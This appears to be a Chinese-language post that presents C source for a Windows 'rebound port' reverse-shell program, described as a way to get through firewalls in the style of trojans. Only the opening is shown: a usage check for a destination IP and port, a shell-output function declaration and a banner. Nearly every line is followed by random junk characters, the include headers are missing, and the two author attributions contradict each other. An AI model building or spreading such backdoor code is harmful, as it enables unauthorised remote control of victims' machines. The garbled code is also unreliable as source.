这是一个Windows下的小程序,可以穿透防火墙反弹连接,当然这是最简单的!看到网络上反弹木马到处都是,心一热就有了这个了(代码很垃圾的)。 .bYDj&]P{
[z:bnS~yiD
/* ============================== qK4E:dD
Rebound port in Windows NT F%Lniv/N
By wind,2006/7 O]n"aAu@
===============================*/ nNIV(
#include
]8q5k5~
#include 1a)NM#
=$g8"[4
#pragma comment(lib,"wsock32.lib") FV/X&u8~
+SmcZ^\OZ
void OutputShell(); g]V}azLr
SOCKET sClient; -P 5VE0
char *szMsg="Rebound port in Windows NT\nBy shucx,2003/10\nRebound successful,Entry Please!\n"; Tv0|e'^
PiZt?r?5w|
void main(int argc,char **argv) sa`7_KB
{ l{4=La{?j
WSADATA stWsaData; !+.|T9P
int nRet; X9nt;A2TU+
SOCKADDR_IN stSaiClient,stSaiServer; 8 F'i5i
L;xc,"\3
if(argc != 3) XQ<2(}]4
{ #Xri%&~
printf("Useage:\n\rRebound DestIP DestPort\n"); MjG=6.J|`
return; aT F}
} "JSg/optc
>#R<